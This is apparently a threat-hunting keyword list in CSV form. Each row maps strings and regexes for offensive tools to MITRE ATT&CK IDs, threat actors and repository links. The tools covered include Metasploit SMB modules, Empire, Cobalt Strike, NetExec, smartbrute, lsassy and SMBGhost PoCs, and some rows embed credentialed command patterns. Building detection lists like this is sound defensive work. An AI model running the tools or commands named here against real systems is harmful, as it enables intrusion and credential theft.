"*slyd0g/DLLHijackTest*",".{0,1000}slyd0g\/DLLHijackTest.{0,1000}","offensive_tool_keyword","DLLHijackTest","DLL and PowerShell script to assist with finding DLL hijacks","T1574.002 - T1055.001 - T1059.001 - T1036.005","TA0005 - TA0004 - TA0002","N/A","N/A","Defense Evasion","https://github.com/slyd0g/DLLHijackTest","1","1","N/A","N/A","9","4","335","62","2020-10-01T22:37:36Z","2020-06-20T04:33:01Z","59642" "*slyd0g/SharpClipboard*",".{0,1000}slyd0g\/SharpClipboard.{0,1000}","offensive_tool_keyword","SharpClipboard","monitor the content of the clipboard continuously","T1115","TA0006 - TA0009","N/A","N/A","Credential Access","http://github.com/slyd0g/SharpClipboard","1","1","N/A","N/A","8","1","N/A","N/A","N/A","N/A","59643" "*Small Shell - Edited By KingDefacer*",".{0,1000}Small\sShell\s\-\sEdited\sBy\sKingDefacer.{0,1000}","offensive_tool_keyword","OWASP rules","OWASP repo of rules - extracted strings for detection","T1100 - T1505.003 - T1059.001","TA0003","N/A","N/A","Persistence","https://github.com/coreruleset/coreruleset/","1","0","N/A","php title webshell","7","10","2536","403","2025-04-22T10:55:49Z","2020-05-13T11:28:52Z","59644" "*Small tool that allow you to bypass the firewall during COM operations*",".{0,1000}Small\stool\sthat\sallow\syou\sto\sbypass\sthe\sfirewall\sduring\sCOM\soperations.{0,1000}","offensive_tool_keyword","RemoteKrbRelay","similar to KrbRelay and KrbRelayUp but With RemoteKrbRelay this can be done remotely","T1550.004 - T1557.001 - T1021.005 - T1105","TA0008 - TA0005","N/A","N/A","Lateral Movement","https://github.com/CICADA8-Research/RemoteKrbRelay","1","0","N/A","N/A","10","6","581","90","2024-06-30T14:08:50Z","2024-06-24T17:38:46Z","59645" "*smart_try_password_or_hash(*",".{0,1000}smart_try_password_or_hash\(.{0,1000}","offensive_tool_keyword","smartbrute","Password spraying and bruteforcing tool for Active Directory Domain Services","T1110.001 - T1110.003","TA0001 - TA0006","N/A","N/A","Credential 
Access","https://github.com/ShutdownRepo/smartbrute","1","0","N/A","N/A","10","4","365","54","2024-10-27T20:47:29Z","2021-07-16T14:53:29Z","59646" "*smartbrute *kerberos*",".{0,1000}smartbrute\s.{0,1000}kerberos.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","59647" "*smartbrute%2520brute*",".{0,1000}smartbrute\%2520brute.{0,1000}","offensive_tool_keyword","smartbrute","Password spraying and bruteforcing tool for Active Directory Domain Services","T1110.001 - T1110.003","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/smartbrute","1","0","N/A","N/A","10","4","365","54","2024-10-27T20:47:29Z","2021-07-16T14:53:29Z","59648" "*smartbrute.py*",".{0,1000}smartbrute\.py.{0,1000}","offensive_tool_keyword","smartbrute","Password spraying and bruteforcing tool for Active Directory Domain Services","T1110.001 - T1110.003","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/smartbrute","1","1","N/A","N/A","10","4","365","54","2024-10-27T20:47:29Z","2021-07-16T14:53:29Z","59649" "*SmashedPotato.cs*",".{0,1000}SmashedPotato\.cs.{0,1000}","offensive_tool_keyword","SmashedPotato","A modification of @breenmachine original Hot Potato Priv Esc Exploit","T1059 - T1134 - T1201 - T1518","TA0002 - TA0004 - TA0040","N/A","N/A","Exploitation tool","https://github.com/Cn33liz/SmashedPotato","1","1","N/A","N/A","N/A","1","83","35","2016-01-29T14:31:18Z","2016-01-20T20:49:08Z","59650" "*SmashedPotato.exe*",".{0,1000}SmashedPotato\.exe.{0,1000}","offensive_tool_keyword","SmashedPotato","A modification of @breenmachine original Hot Potato Priv Esc Exploit","T1059 - T1134 - 
T1201 - T1518","TA0002 - TA0004 - TA0040","N/A","N/A","Exploitation tool","https://github.com/Cn33liz/SmashedPotato","1","1","N/A","N/A","N/A","1","83","35","2016-01-29T14:31:18Z","2016-01-20T20:49:08Z","59651" "*smb * -u * -p * * -M bh_owned*",".{0,1000}smb\s.{0,1000}\s\-u\s.{0,1000}\s\-p\s.{0,1000}\s.{0,1000}\s\-M\sbh_owned.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","59652" "*smb * -u * -p * -M ioxidresolver*",".{0,1000}smb\s.{0,1000}\s\-u\s.{0,1000}\s\-p\s.{0,1000}\s\-M\sioxidresolver.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","59653" "*smb 1* -u * -p * -x ""whoami""*",".{0,1000}smb\s1.{0,1000}\s\-u\s.{0,1000}\s\-p\s.{0,1000}\s\-x\s\""whoami\"".{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","59654" "*smb.dcsync*",".{0,1000}smb\.dcsync.{0,1000}","offensive_tool_keyword","whiskeysamlandfriends","GoldenSAML Attack Libraries and 
Framework","T1606.002","TA0006","N/A","N/A","Credential Access","https://github.com/secureworks/whiskeysamlandfriends","1","1","N/A","N/A","N/A","1","72","9","2024-06-05T14:56:28Z","2021-11-04T15:30:12Z","59655" "*smb/impacket*",".{0,1000}smb\/impacket.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","59656" "*smb/relay/ntlm*",".{0,1000}smb\/relay\/ntlm.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. 
and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","59657" "*SMB\SigningNotRequired-*.txt*",".{0,1000}SMB\\SigningNotRequired\-.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","59658" "*smb_doublepulsar_rce.*",".{0,1000}smb_doublepulsar_rce\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. 
identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","59659" "*smb_doublepulsar_rce.rb*",".{0,1000}smb_doublepulsar_rce\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","59660" "*smb_enumshares*",".{0,1000}smb_enumshares.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","59661" "*smb_enumshares.*",".{0,1000}smb_enumshares\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","59662" "*smb_enumusers*",".{0,1000}smb_enumusers.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","59663" "*smb_enumusers.*",".{0,1000}smb_enumusers\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","59664" "*smb_enumusers_domain.*",".{0,1000}smb_enumusers_domain\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","59665" "*smb_eternalblue*",".{0,1000}smb_eternalblue.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","Exploit-EternalBlue.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","59666" "*smb_ghost.py*",".{0,1000}smb_ghost\.py.{0,1000}","offensive_tool_keyword","SMBGhost","Simple scanner for CVE-2020-0796 - SMBv3 RCE.","T1210 - T1573 - T1553 - T1216 - T1027","TA0006 - TA0011 - TA0008","N/A","N/A","Discovery","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","1","N/A","N/A","7","7","N/A","N/A","N/A","N/A","59667" "*smb_ms17_010_pass*",".{0,1000}smb_ms17_010_pass.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. 
and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","59668" "*smb_pipename_stager*",".{0,1000}smb_pipename_stager.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic 
Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","N/A","10","10","657","88","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z","59669" "*smb_rras_erraticgopher.*",".{0,1000}smb_rras_erraticgopher\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","59670" "*smb_shadow.*",".{0,1000}smb_shadow\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","59671" "*smb_shadow.rb*",".{0,1000}smb_shadow\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","59672" "*smb_stealth.py*",".{0,1000}smb_stealth\.py.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","1","N/A","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","59673" "*smb_win.py*",".{0,1000}smb_win\.py.{0,1000}","offensive_tool_keyword","SMBGhost_RCE_PoC","RCE PoC for CVE-2020-0796 SMBGhost","T1210 - T1059 - T1505 - T1021 - T1027","TA0001 - TA0002 - TA0003 - TA0040","N/A","N/A","Exploitation tool","https://github.com/chompie1337/SMBGhost_RCE_PoC","1","1","N/A","N/A","N/A","10","1339","349","2020-07-02T18:51:47Z","2020-06-02T00:14:47Z","59674" "*smb1_anonymous_connect_ipc*",".{0,1000}smb1_anonymous_connect_ipc.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","Exploit-EternalBlue.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","59675" "*smb1_anonymous_login*",".{0,1000}smb1_anonymous_login.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
